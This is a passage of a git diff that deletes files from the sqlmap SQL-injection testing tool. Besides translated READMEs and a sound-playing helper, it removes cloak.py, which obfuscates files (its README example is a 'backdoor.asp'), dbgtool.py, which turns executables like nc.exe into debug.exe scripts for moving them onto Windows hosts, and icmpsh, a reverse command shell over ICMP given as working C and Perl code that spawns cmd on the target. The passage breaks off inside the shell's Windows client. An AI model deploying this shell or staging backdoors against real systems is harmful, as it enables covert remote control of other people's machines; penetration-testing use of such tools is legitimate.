todas as opções, juntamente com exemplos, aconselhamos que você consulte o [manual do usuário](https://github.com/sqlmapproject/sqlmap/wiki). 
- -Links ----- - -* Homepage: http://sqlmap.org -* Download: [.tar.gz](https://github.com/sqlmapproject/sqlmap/tarball/master) ou [.zip](https://github.com/sqlmapproject/sqlmap/zipball/master) -* Commits RSS feed: https://github.com/sqlmapproject/sqlmap/commits/master.atom -* Issue tracker: https://github.com/sqlmapproject/sqlmap/issues -* Manual do Usuário: https://github.com/sqlmapproject/sqlmap/wiki -* Perguntas frequentes (FAQ): https://github.com/sqlmapproject/sqlmap/wiki/FAQ -* Mailing list subscription: https://lists.sourceforge.net/lists/listinfo/sqlmap-users -* Mailing list RSS feed: http://rss.gmane.org/messages/complete/gmane.comp.security.sqlmap -* Mailing list archive: http://news.gmane.org/gmane.comp.security.sqlmap -* Twitter: [@sqlmap](https://twitter.com/sqlmap) -* Demonstrações: [#1](http://www.youtube.com/user/inquisb/videos) e [#2](http://www.youtube.com/user/stamparm/videos) -* Imagens: https://github.com/sqlmapproject/sqlmap/wiki/Screenshots diff --git a/doc/translations/README-tr-TR.md b/doc/translations/README-tr-TR.md deleted file mode 100644 index d6b9cbc9..00000000 --- a/doc/translations/README-tr-TR.md +++ /dev/null @@ -1,56 +0,0 @@ -# sqlmap - -[![Build Status](https://api.travis-ci.org/sqlmapproject/sqlmap.svg?branch=master)](https://api.travis-ci.org/sqlmapproject/sqlmap) [![Python 2.6|2.7](https://img.shields.io/badge/python-2.6|2.7-yellow.svg)](https://www.python.org/) [![License](https://img.shields.io/badge/license-GPLv2-red.svg)](https://raw.githubusercontent.com/sqlmapproject/sqlmap/master/doc/COPYING) [![Twitter](https://img.shields.io/badge/twitter-@sqlmap-blue.svg)](https://twitter.com/sqlmap) - -sqlmap sql injection açıklarını otomatik olarak tespit ve istismar etmeye yarayan açık kaynak bir penetrasyon aracıdır. 
sqlmap geliÅŸmiÅŸ tespit özelliÄŸinin yanı sıra penetrasyon testleri sırasında gerekli olabilecek bir çok aracı, -uzak veritabınınından, veri indirmek, dosya sistemine eriÅŸmek, dosya çalıştırmak gibi - iÅŸlevleri de barındırmaktadır. - - -Ekran görüntüleri ----- - -![Screenshot](https://raw.github.com/wiki/sqlmapproject/sqlmap/images/sqlmap_screenshot.png) - - -İsterseniz özelliklerin tanıtımının yapıldığı [collection of screenshots](https://github.com/sqlmapproject/sqlmap/wiki/Screenshots) sayfasını ziyaret edebilirsiniz. - - -Kurulum ----- - -[Buraya](https://github.com/sqlmapproject/sqlmap/tarball/master) tıklayarak en son sürüm tarball'ı veya [buraya](https://github.com/sqlmapproject/sqlmap/zipball/master) tıklayarak zipbal'ı indirebilirsiniz. - -Veya tercihen, [Git](https://github.com/sqlmapproject/sqlmap) reposunu klonlayarak indirebilirsiniz - - git clone https://github.com/sqlmapproject/sqlmap.git sqlmap-dev - -sqlmap [Python](http://www.python.org/download/) sitesinde bulunan **2.6.x** and **2.7.x** versiyonları ile bütün platformlarda çalışabilmektedir. - -Kullanım ----- - - -Bütün basit seçeneklerin listesini gösterir - - python sqlmap.py -h - -Bütün seçenekleri gösterir - - python sqlmap.py -hh - -Program ile ilgili örnekleri [burada](https://gist.github.com/stamparm/5335217) bulabilirsiniz. 
Daha fazlası içinsqlmap'in bütün açıklamaları ile birlikte bütün özelliklerinin, örnekleri ile bulunduÄŸu [manuel sayfamıza](https://github.com/sqlmapproject/sqlmap/wiki) bakmanızı tavsiye ediyoruz - -Links ----- - -* Anasayfa: http://sqlmap.org -* İndirme baÄŸlantıları: [.tar.gz](https://github.com/sqlmapproject/sqlmap/tarball/master) or [.zip](https://github.com/sqlmapproject/sqlmap/zipball/master) -* Commitlerin RSS beslemeleri: https://github.com/sqlmapproject/sqlmap/commits/master.atom -* Hata takip etme sistemi: https://github.com/sqlmapproject/sqlmap/issues -* Kullanıcı Manueli: https://github.com/sqlmapproject/sqlmap/wiki -* Sıkça Sorulan Sorular(SSS): https://github.com/sqlmapproject/sqlmap/wiki/FAQ -* Mail listesi: https://lists.sourceforge.net/lists/listinfo/sqlmap-users -* Mail RSS takibi: http://rss.gmane.org/messages/complete/gmane.comp.security.sqlmap -* Mail listesi arÅŸivi: http://news.gmane.org/gmane.comp.security.sqlmap -* Twitter: [@sqlmap](https://twitter.com/sqlmap) -* Demolar: [http://www.youtube.com/user/inquisb/videos](http://www.youtube.com/user/inquisb/videos) -* Ekran görüntüleri: https://github.com/sqlmapproject/sqlmap/wiki/Screenshots diff --git a/doc/translations/README-zh-CN.md b/doc/translations/README-zh-CN.md deleted file mode 100644 index 6aea35f7..00000000 --- a/doc/translations/README-zh-CN.md +++ /dev/null @@ -1,52 +0,0 @@ -# sqlmap - -[![Build Status](https://api.travis-ci.org/sqlmapproject/sqlmap.svg?branch=master)](https://api.travis-ci.org/sqlmapproject/sqlmap) [![Python 2.6|2.7](https://img.shields.io/badge/python-2.6|2.7-yellow.svg)](https://www.python.org/) [![License](https://img.shields.io/badge/license-GPLv2-red.svg)](https://raw.githubusercontent.com/sqlmapproject/sqlmap/master/doc/COPYING) [![Twitter](https://img.shields.io/badge/twitter-@sqlmap-blue.svg)](https://twitter.com/sqlmap) - -sqlmap 
是一个开æºçš„æ¸—逿µ‹è¯•工具,å¯ä»¥ç”¨æ¥è‡ªåŠ¨åŒ–çš„æ£€æµ‹ï¼Œåˆ©ç”¨SQLæ³¨å…¥æ¼æ´žï¼ŒèŽ·å–æ•°æ®åº“æœåŠ¡å™¨çš„æƒé™ã€‚它具有功能强大的检测引擎,针对å„ç§ä¸åŒç±»åž‹æ•°æ®åº“çš„æ¸—é€æµ‹è¯•çš„åŠŸèƒ½é€‰é¡¹ï¼ŒåŒ…æ‹¬èŽ·å–æ•°æ®åº“中存储的数æ®ï¼Œè®¿é—®æ“作系统文件甚至å¯ä»¥é€šè¿‡å¤–带数æ®è¿žæŽ¥çš„æ–¹å¼æ‰§è¡Œæ“作系统命令。 - -演示截图 ----- - -![截图](https://raw.github.com/wiki/sqlmapproject/sqlmap/images/sqlmap_screenshot.png) - -ä½ å¯ä»¥è®¿é—® wiki上的 [截图](https://github.com/sqlmapproject/sqlmap/wiki/Screenshots) 查看å„ç§ç”¨æ³•的演示 - -安装方法 ----- - -ä½ å¯ä»¥ç‚¹å‡» [这里](https://github.com/sqlmapproject/sqlmap/tarball/master) 下载最新的 `tar` 打包的æºä»£ç  或者点击 [这里](https://github.com/sqlmapproject/sqlmap/zipball/master)下载最新的 `zip` 打包的æºä»£ç . - -推è你从 [Git](https://github.com/sqlmapproject/sqlmap) ä»“åº“èŽ·å–æœ€æ–°çš„æºä»£ç : - - git clone https://github.com/sqlmapproject/sqlmap.git sqlmap-dev - -sqlmap å¯ä»¥è¿è¡Œåœ¨ [Python](http://www.python.org/download/) **2.6.x** å’Œ **2.7.x** 版本的任何平å°ä¸Š - -使用方法 ----- - -通过如下命令å¯ä»¥æŸ¥çœ‹åŸºæœ¬çš„用法åŠå‘½ä»¤è¡Œå‚æ•°: - - python sqlmap.py -h - -通过如下的命令å¯ä»¥æŸ¥çœ‹æ‰€æœ‰çš„用法åŠå‘½ä»¤è¡Œå‚æ•°: - - python sqlmap.py -hh - -ä½ å¯ä»¥ä»Ž [这里](https://gist.github.com/stamparm/5335217) 看到一个sqlmap 的使用样例。除此以外,你还å¯ä»¥æŸ¥çœ‹ [使用手册](https://github.com/sqlmapproject/sqlmap/wiki)。获å–sqlmap所有支æŒçš„特性ã€å‚æ•°ã€å‘½ä»¤è¡Œé€‰é¡¹å¼€å…³åŠè¯´æ˜Žçš„使用帮助。 - -链接 ----- - -* 项目主页: http://sqlmap.org -* æºä»£ç ä¸‹è½½: [.tar.gz](https://github.com/sqlmapproject/sqlmap/tarball/master) or [.zip](https://github.com/sqlmapproject/sqlmap/zipball/master) -* RSS 订阅: https://github.com/sqlmapproject/sqlmap/commits/master.atom -* Issue tracker: https://github.com/sqlmapproject/sqlmap/issues -* 使用手册: https://github.com/sqlmapproject/sqlmap/wiki -* 常è§é—®é¢˜ (FAQ): https://github.com/sqlmapproject/sqlmap/wiki/FAQ -* 邮件讨论列表: https://lists.sourceforge.net/lists/listinfo/sqlmap-users -* 邮件列表 RSS 订阅: http://rss.gmane.org/messages/complete/gmane.comp.security.sqlmap -* 邮件列表归档: http://news.gmane.org/gmane.comp.security.sqlmap -* Twitter: 
[@sqlmap](https://twitter.com/sqlmap) -* 教程: [http://www.youtube.com/user/inquisb/videos](http://www.youtube.com/user/inquisb/videos) -* 截图: https://github.com/sqlmapproject/sqlmap/wiki/Screenshots diff --git a/extra/__init__.py b/extra/__init__.py deleted file mode 100644 index c2e45792..00000000 --- a/extra/__init__.py +++ /dev/null @@ -1,8 +0,0 @@ -#!/usr/bin/env python - -""" -Copyright (c) 2006-2016 sqlmap developers (http://sqlmap.org/) -See the file 'doc/COPYING' for copying permission -""" - -pass diff --git a/extra/beep/__init__.py b/extra/beep/__init__.py deleted file mode 100644 index c2e45792..00000000 --- a/extra/beep/__init__.py +++ /dev/null @@ -1,8 +0,0 @@ -#!/usr/bin/env python - -""" -Copyright (c) 2006-2016 sqlmap developers (http://sqlmap.org/) -See the file 'doc/COPYING' for copying permission -""" - -pass diff --git a/extra/beep/beep.py b/extra/beep/beep.py deleted file mode 100644 index 48ba4352..00000000 --- a/extra/beep/beep.py +++ /dev/null @@ -1,96 +0,0 @@ -#!/usr/bin/env python - -""" -beep.py - Make a beep sound - -Copyright (c) 2006-2016 sqlmap developers (http://sqlmap.org/) -See the file 'doc/COPYING' for copying permission -""" - -import os -import subprocess -import sys -import wave - -BEEP_WAV_FILENAME = os.path.join(os.path.dirname(__file__), "beep.wav") - -def beep(): - try: - if subprocess.mswindows: - _win_wav_play(BEEP_WAV_FILENAME) - elif sys.platform == "darwin": - _mac_beep() - elif sys.platform == "linux2": - _linux_wav_play(BEEP_WAV_FILENAME) - else: - _speaker_beep() - except: - _speaker_beep() - -def _speaker_beep(): - sys.stdout.write('\a') # doesn't work on modern Linux systems - - try: - sys.stdout.flush() - except IOError: - pass - -def _mac_beep(): - import Carbon.Snd - Carbon.Snd.SysBeep(1) - -def _win_wav_play(filename): - import winsound - - winsound.PlaySound(filename, winsound.SND_FILENAME) - -def _linux_wav_play(filename): - for _ in ("aplay", "paplay", "play"): - if not os.system("%s '%s' 2>/dev/null" % (_, 
filename)): - return - - import ctypes - - PA_STREAM_PLAYBACK = 1 - PA_SAMPLE_S16LE = 3 - BUFFSIZE = 1024 - - class struct_pa_sample_spec(ctypes.Structure): - _fields_ = [("format", ctypes.c_int), ("rate", ctypes.c_uint32), ("channels", ctypes.c_uint8)] - - pa = ctypes.cdll.LoadLibrary("libpulse-simple.so.0") - - wave_file = wave.open(filename, "rb") - - pa_sample_spec = struct_pa_sample_spec() - pa_sample_spec.rate = wave_file.getframerate() - pa_sample_spec.channels = wave_file.getnchannels() - pa_sample_spec.format = PA_SAMPLE_S16LE - - error = ctypes.c_int(0) - - pa_stream = pa.pa_simple_new(None, filename, PA_STREAM_PLAYBACK, None, "playback", ctypes.byref(pa_sample_spec), None, None, ctypes.byref(error)) - if not pa_stream: - raise Exception("Could not create pulse audio stream: %s" % pa.strerror(ctypes.byref(error))) - - while True: - latency = pa.pa_simple_get_latency(pa_stream, ctypes.byref(error)) - if latency == -1: - raise Exception("Getting latency failed") - - buf = wave_file.readframes(BUFFSIZE) - if not buf: - break - - if pa.pa_simple_write(pa_stream, buf, len(buf), ctypes.byref(error)): - raise Exception("Could not play file") - - wave_file.close() - - if pa.pa_simple_drain(pa_stream, ctypes.byref(error)): - raise Exception("Could not simple drain") - - pa.pa_simple_free(pa_stream) - -if __name__ == "__main__": - beep() diff --git a/extra/beep/beep.wav b/extra/beep/beep.wav deleted file mode 100644 index 35903d8a..00000000 Binary files a/extra/beep/beep.wav and /dev/null differ diff --git a/extra/cloak/README.txt b/extra/cloak/README.txt deleted file mode 100644 index 7743ff08..00000000 --- a/extra/cloak/README.txt +++ /dev/null @@ -1,22 +0,0 @@ -To use cloak.py you need to pass it the original file, -and optionally the output file name. - -Example: - -$ python ./cloak.py -i backdoor.asp -o backdoor.asp_ - -This will create an encrypted and compressed binary file backdoor.asp_. 
- -Such file can then be converted to its original form by using the -d -functionality of the cloak.py program: - -$ python ./cloak.py -d -i backdoor.asp_ -o backdoor.asp - -If you skip the output file name, general rule is that the compressed -file names are suffixed with the character '_', while the original is -get by skipping the last character. So, that means that the upper -examples can also be written in the following form: - -$ python ./cloak.py -i backdoor.asp - -$ python ./cloak.py -d -i backdoor.asp_ diff --git a/extra/cloak/__init__.py b/extra/cloak/__init__.py deleted file mode 100644 index c2e45792..00000000 --- a/extra/cloak/__init__.py +++ /dev/null @@ -1,8 +0,0 @@ -#!/usr/bin/env python - -""" -Copyright (c) 2006-2016 sqlmap developers (http://sqlmap.org/) -See the file 'doc/COPYING' for copying permission -""" - -pass diff --git a/extra/cloak/cloak.py b/extra/cloak/cloak.py deleted file mode 100755 index 3137fe9b..00000000 --- a/extra/cloak/cloak.py +++ /dev/null @@ -1,85 +0,0 @@ -#!/usr/bin/env python - -""" -cloak.py - Simple file encryption/compression utility - -Copyright (c) 2006-2016 sqlmap developers (http://sqlmap.org/) -See the file 'doc/COPYING' for copying permission -""" - -import os -import sys -import zlib - -from optparse import OptionError -from optparse import OptionParser - -def hideAscii(data): - retVal = "" - for i in xrange(len(data)): - if ord(data[i]) < 128: - retVal += chr(ord(data[i]) ^ 127) - else: - retVal += data[i] - - return retVal - -def cloak(inputFile=None, data=None): - if data is None: - with open(inputFile, "rb") as f: - data = f.read() - - return hideAscii(zlib.compress(data)) - -def decloak(inputFile=None, data=None): - if data is None: - with open(inputFile, "rb") as f: - data = f.read() - try: - data = zlib.decompress(hideAscii(data)) - except: - print 'ERROR: the provided input file \'%s\' does not contain valid cloaked content' % inputFile - sys.exit(1) - finally: - f.close() - - return data - -def main(): 
- usage = '%s [-d] -i [-o ]' % sys.argv[0] - parser = OptionParser(usage=usage, version='0.1') - - try: - parser.add_option('-d', dest='decrypt', action="store_true", help='Decrypt') - parser.add_option('-i', dest='inputFile', help='Input file') - parser.add_option('-o', dest='outputFile', help='Output file') - - (args, _) = parser.parse_args() - - if not args.inputFile: - parser.error('Missing the input file, -h for help') - - except (OptionError, TypeError), e: - parser.error(e) - - if not os.path.isfile(args.inputFile): - print 'ERROR: the provided input file \'%s\' is non existent' % args.inputFile - sys.exit(1) - - if not args.decrypt: - data = cloak(args.inputFile) - else: - data = decloak(args.inputFile) - - if not args.outputFile: - if not args.decrypt: - args.outputFile = args.inputFile + '_' - else: - args.outputFile = args.inputFile[:-1] - - f = open(args.outputFile, 'wb') - f.write(data) - f.close() - -if __name__ == '__main__': - main() diff --git a/extra/dbgtool/README.txt b/extra/dbgtool/README.txt deleted file mode 100644 index fa55859a..00000000 --- a/extra/dbgtool/README.txt +++ /dev/null @@ -1,20 +0,0 @@ -To use dbgtool.py you need to pass it the MS-DOS executable binary file, -and optionally the output debug.exe script file name. - -Example: - -$ python ./dbgtool.py -i ./nc.exe -o nc.scr - -This will create a ASCII text file with CRLF line terminators called -nc.scr. 
- -Such file can then be converted to its original portable executable with -the Windows native debug.exe, that is installed by default in all Windows -systems: - -> debug.exe < nc.scr - -To be able to execute it on Windows you have to rename it to end with -'.com' or '.exe': - -> ren nc_exe nc.exe diff --git a/extra/dbgtool/__init__.py b/extra/dbgtool/__init__.py deleted file mode 100644 index c2e45792..00000000 --- a/extra/dbgtool/__init__.py +++ /dev/null @@ -1,8 +0,0 @@ -#!/usr/bin/env python - -""" -Copyright (c) 2006-2016 sqlmap developers (http://sqlmap.org/) -See the file 'doc/COPYING' for copying permission -""" - -pass diff --git a/extra/dbgtool/dbgtool.py b/extra/dbgtool/dbgtool.py deleted file mode 100644 index fd697e81..00000000 --- a/extra/dbgtool/dbgtool.py +++ /dev/null @@ -1,95 +0,0 @@ -#!/usr/bin/env python - -""" -dbgtool.py - Portable executable to ASCII debug script converter - -Copyright (c) 2006-2016 sqlmap developers (http://sqlmap.org/) -See the file 'doc/COPYING' for copying permission -""" - -import os -import sys -import struct - -from optparse import OptionError -from optparse import OptionParser - -def convert(inputFile): - fileStat = os.stat(inputFile) - fileSize = fileStat.st_size - - if fileSize > 65280: - print "ERROR: the provided input file '%s' is too big for debug.exe" % inputFile - sys.exit(1) - - script = "n %s\nr cx\n" % os.path.basename(inputFile.replace(".", "_")) - script += "%x\nf 0100 ffff 00\n" % fileSize - scrString = "" - counter = 256 - counter2 = 0 - - fp = open(inputFile, "rb") - fileContent = fp.read() - - for fileChar in fileContent: - unsignedFileChar = struct.unpack("B", fileChar)[0] - - if unsignedFileChar != 0: - counter2 += 1 - - if not scrString: - scrString = "e %0x %02x" % (counter, unsignedFileChar) - else: - scrString += " %02x" % unsignedFileChar - elif scrString: - script += "%s\n" % scrString - scrString = "" - counter2 = 0 - - counter += 1 - - if counter2 == 20: - script += "%s\n" % scrString - 
scrString = "" - counter2 = 0 - - script += "w\nq\n" - - return script - -def main(inputFile, outputFile): - if not os.path.isfile(inputFile): - print "ERROR: the provided input file '%s' is not a regular file" % inputFile - sys.exit(1) - - script = convert(inputFile) - - if outputFile: - fpOut = open(outputFile, "w") - sys.stdout = fpOut - sys.stdout.write(script) - sys.stdout.close() - else: - print script - -if __name__ == "__main__": - usage = "%s -i [-o ]" % sys.argv[0] - parser = OptionParser(usage=usage, version="0.1") - - try: - parser.add_option("-i", dest="inputFile", help="Input binary file") - - parser.add_option("-o", dest="outputFile", help="Output debug.exe text file") - - (args, _) = parser.parse_args() - - if not args.inputFile: - parser.error("Missing the input file, -h for help") - - except (OptionError, TypeError), e: - parser.error(e) - - inputFile = args.inputFile - outputFile = args.outputFile - - main(inputFile, outputFile) diff --git a/extra/icmpsh/README.txt b/extra/icmpsh/README.txt deleted file mode 100644 index 631f9ee3..00000000 --- a/extra/icmpsh/README.txt +++ /dev/null @@ -1,45 +0,0 @@ -icmpsh - simple reverse ICMP shell - -icmpsh is a simple reverse ICMP shell with a win32 slave and a POSIX compatible master in C or Perl. - - ---- Running the Master --- - -The master is straight forward to use. There are no extra libraries required for the C version. -The Perl master however has the following dependencies: - - * IO::Socket - * NetPacket::IP - * NetPacket::ICMP - - -When running the master, don't forget to disable ICMP replies by the OS. For example: - - sysctl -w net.ipv4.icmp_echo_ignore_all=1 - -If you miss doing that, you will receive information from the slave, but the slave is unlikely to receive -commands send from the master. - - ---- Running the Slave --- - -The slave comes with a few command line options as outlined below: - - --t host host ip address to send ping requests to. This option is mandatory! 
- --r send a single test icmp request containing the string "Test1234" and then quit. - This is for testing the connection. - --d milliseconds delay between requests in milliseconds - --o milliseconds timeout of responses in milliseconds. If a response has not received in time, - the slave will increase a counter of blanks. If that counter reaches a limit, the slave will quit. - The counter is set back to 0 if a response was received. - --b num limit of blanks (unanswered icmp requests before quitting - --s bytes maximal data buffer size in bytes - - -In order to improve the speed, lower the delay (-d) between requests or increase the size (-s) of the data buffer. diff --git a/extra/icmpsh/__init__.py b/extra/icmpsh/__init__.py deleted file mode 100644 index 1e340fa5..00000000 --- a/extra/icmpsh/__init__.py +++ /dev/null @@ -1,22 +0,0 @@ -#!/usr/bin/env python -# -# icmpsh - simple icmp command shell (port of icmpsh-m.pl written in -# Perl by Nico Leidecker ) -# -# Copyright (c) 2010, Bernardo Damele A. G. -# -# -# This program is free software: you can redistribute it and/or modify -# it under the terms of the GNU General Public License as published by -# the Free Software Foundation, either version 3 of the License, or -# (at your option) any later version. -# -# This program is distributed in the hope that it will be useful, -# but WITHOUT ANY WARRANTY; without even the implied warranty of -# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the -# GNU General Public License for more details. -# -# You should have received a copy of the GNU General Public License -# along with this program. If not, see . 
- -pass diff --git a/extra/icmpsh/icmpsh-m.c b/extra/icmpsh/icmpsh-m.c deleted file mode 100644 index 32c3edb7..00000000 --- a/extra/icmpsh/icmpsh-m.c +++ /dev/null @@ -1,134 +0,0 @@ -/* - * icmpsh - simple icmp command shell - * Copyright (c) 2010, Nico Leidecker - * This program is free software: you can redistribute it and/or modify - * it under the terms of the GNU General Public License as published by - * the Free Software Foundation, either version 3 of the License, or - * (at your option) any later version. - * - * This program is distributed in the hope that it will be useful, - * but WITHOUT ANY WARRANTY; without even the implied warranty of - * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the - * GNU General Public License for more details. - * - * You should have received a copy of the GNU General Public License - * along with this program. If not, see . - */ - -#include -#include -#include -#include -#include -#include -#include -#include -#include -#include -#include - -#define IN_BUF_SIZE 1024 -#define OUT_BUF_SIZE 64 - -// calculate checksum -unsigned short checksum(unsigned short *ptr, int nbytes) -{ - unsigned long sum; - unsigned short oddbyte, rs; - - sum = 0; - while(nbytes > 1) { - sum += *ptr++; - nbytes -= 2; - } - - if(nbytes == 1) { - oddbyte = 0; - *((unsigned char *) &oddbyte) = *(u_char *)ptr; - sum += oddbyte; - } - - sum = (sum >> 16) + (sum & 0xffff); - sum += (sum >> 16); - rs = ~sum; - return rs; -} - -int main(int argc, char **argv) -{ - int sockfd; - int flags; - char in_buf[IN_BUF_SIZE]; - char out_buf[OUT_BUF_SIZE]; - unsigned int out_size; - int nbytes; - struct iphdr *ip; - struct icmphdr *icmp; - char *data; - struct sockaddr_in addr; - - - printf("icmpsh - master\n"); - - // create raw ICMP socket - sockfd = socket(PF_INET, SOCK_RAW, IPPROTO_ICMP); - if (sockfd == -1) { - perror("socket"); - return -1; - } - - // set stdin to non-blocking - flags = fcntl(0, F_GETFL, 0); - flags |= O_NONBLOCK; - fcntl(0, F_SETFL, 
flags); - - printf("running...\n"); - while(1) { - - // read data from socket - memset(in_buf, 0x00, IN_BUF_SIZE); - nbytes = read(sockfd, in_buf, IN_BUF_SIZE - 1); - if (nbytes > 0) { - // get ip and icmp header and data part - ip = (struct iphdr *) in_buf; - if (nbytes > sizeof(struct iphdr)) { - nbytes -= sizeof(struct iphdr); - icmp = (struct icmphdr *) (ip + 1); - if (nbytes > sizeof(struct icmphdr)) { - nbytes -= sizeof(struct icmphdr); - data = (char *) (icmp + 1); - data[nbytes] = '\0'; - printf("%s", data); - fflush(stdout); - } - - // reuse headers - icmp->type = 0; - addr.sin_family = AF_INET; - addr.sin_addr.s_addr = ip->saddr; - - // read data from stdin - nbytes = read(0, out_buf, OUT_BUF_SIZE); - if (nbytes > -1) { - memcpy((char *) (icmp + 1), out_buf, nbytes); - out_size = nbytes; - } else { - out_size = 0; - } - - icmp->checksum = 0x00; - icmp->checksum = checksum((unsigned short *) icmp, sizeof(struct icmphdr) + out_size); - - // send reply - nbytes = sendto(sockfd, icmp, sizeof(struct icmphdr) + out_size, 0, (struct sockaddr *) &addr, sizeof(addr)); - if (nbytes == -1) { - perror("sendto"); - return -1; - } - } - } - } - - return 0; -} - diff --git a/extra/icmpsh/icmpsh-m.pl b/extra/icmpsh/icmpsh-m.pl deleted file mode 100755 index 5a40b34f..00000000 --- a/extra/icmpsh/icmpsh-m.pl +++ /dev/null @@ -1,62 +0,0 @@ -#!/usr/bin/env perl -# -# icmpsh - simple icmp command shell -# Copyright (c) 2010, Nico Leidecker -# This program is free software: you can redistribute it and/or modify -# it under the terms of the GNU General Public License as published by -# the Free Software Foundation, either version 3 of the License, or -# (at your option) any later version. -# -# This program is distributed in the hope that it will be useful, -# but WITHOUT ANY WARRANTY; without even the implied warranty of -# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the -# GNU General Public License for more details. 
-# -# You should have received a copy of the GNU General Public License -# along with this program. If not, see . -# - - - -use strict; -use IO::Socket; -use NetPacket::IP; -use NetPacket::ICMP qw(ICMP_ECHOREPLY ICMP_ECHO); -use Net::RawIP; -use Fcntl; - -print "icmpsh - master\n"; - -# create raw socket -my $sock = IO::Socket::INET->new( - Proto => "ICMP", - Type => SOCK_RAW, - Blocking => 1) or die "$!"; - -# set stdin to non-blocking -fcntl(STDIN, F_SETFL, O_NONBLOCK) or die "$!"; - -print "running...\n"; - -my $input = ''; -while(1) { - if ($sock->recv(my $buffer, 4096, 0)) { - my $ip = NetPacket::IP->decode($buffer); - my $icmp = NetPacket::ICMP->decode($ip->{data}); - if ($icmp->{type} == ICMP_ECHO) { - # get identifier and sequencenumber - my ($ident,$seq,$data) = unpack("SSa*", $icmp->{data}); - - # write data to stdout and read from stdin - print $data; - $input = ; - - # compile and send response - $icmp->{type} = ICMP_ECHOREPLY; - $icmp->{data} = pack("SSa*", $ident, $seq, $input); - my $raw = $icmp->encode(); - my $addr = sockaddr_in(0, inet_aton($ip->{src_ip})); - $sock->send($raw, 0, $addr) or die "$!\n"; - } - } -} diff --git a/extra/icmpsh/icmpsh-s.c b/extra/icmpsh/icmpsh-s.c deleted file mode 100644 index 5c127d84..00000000 --- a/extra/icmpsh/icmpsh-s.c +++ /dev/null @@ -1,346 +0,0 @@ -/* - * icmpsh - simple icmp command shell - * Copyright (c) 2010, Nico Leidecker - * This program is free software: you can redistribute it and/or modify - * it under the terms of the GNU General Public License as published by - * the Free Software Foundation, either version 3 of the License, or - * (at your option) any later version. - * - * This program is distributed in the hope that it will be useful, - * but WITHOUT ANY WARRANTY; without even the implied warranty of - * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the - * GNU General Public License for more details. 
- * - * You should have received a copy of the GNU General Public License - * along with this program. If not, see . - */ - - -#include -#include -#include -#include -#include -#include - -#define ICMP_HEADERS_SIZE (sizeof(ICMP_ECHO_REPLY) + 8) - -#define STATUS_OK 0 -#define STATUS_SINGLE 1 -#define STATUS_PROCESS_NOT_CREATED 2 - -#define TRANSFER_SUCCESS 1 -#define TRANSFER_FAILURE 0 - -#define DEFAULT_TIMEOUT 3000 -#define DEFAULT_DELAY 200 -#define DEFAULT_MAX_BLANKS 10 -#define DEFAULT_MAX_DATA_SIZE 64 - -FARPROC icmp_create, icmp_send, to_ip; - -int verbose = 0; - -int spawn_shell(PROCESS_INFORMATION *pi, HANDLE *out_read, HANDLE *in_write) -{ - SECURITY_ATTRIBUTES sattr; - STARTUPINFOA si; - HANDLE in_read, out_write; - - memset(&si, 0x00, sizeof(SECURITY_ATTRIBUTES)); - memset(pi, 0x00, sizeof(PROCESS_INFORMATION)); - - // create communication pipes - memset(&sattr, 0x00, sizeof(SECURITY_ATTRIBUTES)); - sattr.nLength = sizeof(SECURITY_ATTRIBUTES); - sattr.bInheritHandle = TRUE; - sattr.lpSecurityDescriptor = NULL; - - if (!CreatePipe(out_read, &out_write, &sattr, 0)) { - return STATUS_PROCESS_NOT_CREATED; - } - if (!SetHandleInformation(*out_read, HANDLE_FLAG_INHERIT, 0)) { - return STATUS_PROCESS_NOT_CREATED; - } - - if (!CreatePipe(&in_read, in_write, &sattr, 0)) { - return STATUS_PROCESS_NOT_CREATED; - } - if (!SetHandleInformation(*in_write, HANDLE_FLAG_INHERIT, 0)) { - return STATUS_PROCESS_NOT_CREATED; - } - - // spawn process - memset(&si, 0x00, sizeof(STARTUPINFO)); - si.cb = sizeof(STARTUPINFO); - si.hStdError = out_write; - si.hStdOutput = out_write; - si.hStdInput = in_read; - si.dwFlags |= STARTF_USESTDHANDLES; - - if (!CreateProcessA(NULL, "cmd", NULL, NULL, TRUE, 0, NULL, NULL, (LPSTARTUPINFOA) &si, pi)) { - return STATUS_PROCESS_NOT_CREATED; - } - - CloseHandle(out_write); - CloseHandle(in_read); - - return STATUS_OK; -} - -void usage(char *path) -{ - printf("%s [options] -t target\n", path); - printf("options:\n"); - printf(" -t host host ip 
address to send ping requests to\n"); - printf(" -r send a single test icmp request and then quit\n"); - printf(" -d milliseconds delay between requests in milliseconds (default is %u)\n", DEFAULT_DELAY); - printf(" -o milliseconds timeout in milliseconds\n"); - printf(" -h this screen\n"); - printf(" -b num maximal number of blanks (unanswered icmp requests)\n"); - printf(" before quitting\n"); - printf(" -s bytes maximal data buffer size in bytes (default is 64 bytes)\n\n", DEFAULT_MAX_DATA_SIZE); - printf("In order to improve the speed, lower the delay (-d) between requests or\n"); - printf("increase the size (-s) of the data buffer\n"); -} - -void create_icmp_channel(HANDLE *icmp_chan) -{ - // create icmp file - *icmp_chan = (HANDLE) icmp_create(); -} - -int transfer_icmp(HANDLE icmp_chan, unsigned int target, char *out_buf, unsigned int out_buf_size, char *in_buf, unsigned int *in_buf_size, unsigned int max_in_data_size, unsigned int timeout) -{ - int rs; - char *temp_in_buf; - int nbytes; - - PICMP_ECHO_REPLY echo_reply; - - temp_in_buf = (char *) malloc(max_in_data_size + ICMP_HEADERS_SIZE); - if (!temp_in_buf) { - return TRANSFER_FAILURE; - } - - // send data to remote host - rs = icmp_send( - icmp_chan, - target, - out_buf, - out_buf_size, - NULL, - temp_in_buf, - max_in_data_size + ICMP_HEADERS_SIZE, - timeout); - - // check received data - if (rs > 0) { - echo_reply = (PICMP_ECHO_REPLY) temp_in_buf; - if (echo_reply->DataSize > max_in_data_size) { - nbytes = max_in_data_size; - } else { - nbytes = echo_reply->DataSize; - } - memcpy(in_buf, echo_reply->Data, nbytes); - *in_buf_size = nbytes; - - free(temp_in_buf); - return TRANSFER_SUCCESS; - } - - free(temp_in_buf); - - return TRANSFER_FAILURE; -} - -int load_deps() -{ - HMODULE lib; - - lib = LoadLibraryA("ws2_32.dll"); - if (lib != NULL) { - to_ip = GetProcAddress(lib, "inet_addr"); - if (!to_ip) { - return 0; - } - } - - lib = LoadLibraryA("iphlpapi.dll"); - if (lib != NULL) { - icmp_create = 
